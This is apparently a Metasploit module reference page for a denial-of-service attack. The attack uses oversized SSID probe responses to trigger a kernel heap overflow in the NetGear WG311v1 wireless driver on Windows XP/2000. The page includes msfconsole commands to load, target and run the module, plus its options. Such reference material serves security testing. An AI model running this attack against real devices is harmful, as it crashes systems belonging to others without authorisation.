NetGear WG311v1 Wireless Driver Long SSID Overflow | Metasploit Exploit Database (DB)

Home > Exploit DB

NetGear WG311v1 Wireless Driver Long SSID Overflow

This module exploits a buffer overflow in the NetGear WG311v1 wireless device driver under Windows XP and 2000. A kernel-mode heap overflow occurs when malformed probe response frame is received that contains a long SSID field This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a NetGear WG311v1 PCI card. A remote code execution module is also in development. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.

Search Other Modules

Rank

Normal

Authors

Laurent Butti < 0x9090 [at] gmail.com >

Vulnerability References

Development

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/dos/wifi/netgear_wg311pci
msf auxiliary(netgear_wg311pci) > set ADDR_DST [STRING]
msf auxiliary(netgear_wg311pci) > run

Module Options

ADDR_DST	The MAC address of the target system
CHANNEL	The initial channel (default: 11)
DRIVER	The name of the wireless driver for lorcon (default: autodetect)
INTERFACE	The name of the wireless interface (default: wlan0)
RUNTIME	The number of seconds to run the attack (default: 60)
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module